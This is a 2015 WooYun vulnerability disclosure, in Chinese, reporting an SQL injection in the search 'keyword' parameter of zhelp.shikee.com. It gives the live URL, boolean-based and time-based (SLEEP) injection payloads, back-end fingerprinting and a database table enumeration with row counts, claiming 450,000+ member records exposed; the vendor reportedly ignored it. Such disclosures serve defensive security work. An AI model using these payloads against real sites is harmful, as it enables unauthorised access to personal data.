当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146950

漏洞标题:试客联盟网众用助手站某处sql注入涉及45W会员信息

相关厂商:shikee.com

漏洞作者: 无名人

提交时间:2015-10-15 16:58

修复时间:2015-10-20 17:00

公开时间:2015-10-20 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

众用助手——国内首家补贴类应用软件分发平台
众用助手基于一站网旗下试客联盟、众划算的试用营销的理念与350万会员,颠覆互联网APP传统的推广模式,开创APP体验营销推广模式。搭建起开发者与真实用户间的分发平台,为广大应用软件开发者提供精准的用户推广和体验营销服务,帮助开发者真正实现精准、有效的推广。

详细说明:

漏洞地址:

http://zhelp.shikee.com/home/search?keyword=a


keword参数存在注入

---
Parameter: keyword (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=a%' AND 4924=4924 AND '%'='
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: keyword=a%' AND (SELECT * FROM (SELECT(SLEEP(5)))yxoY) AND '%'='
---
[14:05:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.10
back-end DBMS: MySQL 5.0.12

漏洞证明:

数据库:

available databases [2]:
[*] information_schema
[*] zhongyongapp


45W+会员信息泄漏

Database: zhongyongapp
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mobile_app_subsidy_apply_period | 9189697 |
| mobile_app_subsidy_apply_log | 7700434 |
| mobile_user_message | 5847387 |
| mobile_system_log_hlpay | 3023412 |
| mobile_app_subsidy_apply | 1956328 |
| mobile_app_downlog | 1316216 |
| mobile_app_subsidy_apply_step | 778630 |
| mobile_app_subsidy_rebates_pay | 778431 |
| mobile_members20150601 | 386149 |
| mobile_app_task_apply_log | 237048 |
| mobile_user_sign_log | 171401 |
| mobile_user_device | 149860 |
| mobile_user | 89294 |
| mobile_app_task_user_share_score | 84091 |
| mobile_user_invite_reward | 79963 |
| mobile_app_img | 67865 |
| mobile_system_subsidy | 62898 |
| mobile_system_subsidy_history | 61087 |
| mobile_app_task_apply | 54780 |
| mobile_app_task_rebates_pay | 33704 |
| mobile_user_invite | 31018 |
| mobile_system_task | 19270 |
| mobile_admin_log | 15890 |
| mobile_app_log | 15181 |
| mobile_system_task_log | 15129 |
| mobile_sql_log | 15104 |
| mobile_task_xls | 13879 |
| mobile_app | 13860 |
| mobile_user_sign | 13744 |
| mobile_app_collection | 8038 |
| mobile_user_comment | 7006 |
| mobile_app_subsidy_log | 4699 |
| mobile_user_suggest | 4606 |
| mobile_app_subsidy_period | 3594 |
| mobile_app_subsidy_finance | 3003 |
| mobile_app_task_log | 1896 |
| mobile_user_first_reward | 1596 |
| mobile_user_extend | 1593 |
| mobile_app_task | 1157 |
| mobile_app_subsidy | 1004 |
| mobile_task_pay | 734 |
| mobile_finance_log | 643 |
| mobile_user_open | 472 |
| mobile_app_subsidy_append | 467 |
| mobile_user_freeze_log | 382 |
| mobile_app_special_apply | 375 |
| mobile_task_img | 348 |
| mobile_app_task_option | 308 |
| mobile_app_category | 150 |
| mobile_message_board | 119 |
| mobile_task_extend | 74 |
| mobile_rebate_failure_log | 65 |
| mobile_help_img | 39 |
| mobile_system_config | 37 |
| mobile_app_special | 36 |
| mobile_common_session | 25 |
| mobile_help_category | 24 |
| mobile_help | 20 |
| mobile_web_home_advertisement | 19 |
| mobile_app_home_advertisement | 12 |
| mobile_app_task_apply_timeout_log | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1285 |
| SESSION_VARIABLES | 445 |
| GLOBAL_VARIABLES | 431 |
| GLOBAL_STATUS | 341 |
| SESSION_STATUS | 341 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| STATISTICS | 138 |
| PARTITIONS | 128 |
| TABLES | 128 |
| KEY_COLUMN_USAGE | 92 |
| TABLE_CONSTRAINTS | 85 |
| PLUGINS | 42 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| PROCESSLIST | 23 |
| SCHEMA_PRIVILEGES | 18 |
| PARAMETERS | 11 |
| ENGINES | 9 |
| REFERENTIAL_CONSTRAINTS | 3 |
| ROUTINES | 3 |
| SCHEMATA | 2 |
| TRIGGERS | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+


1.png


修复方案:

版权声明:转载请注明来源 无名人@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-20 17:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无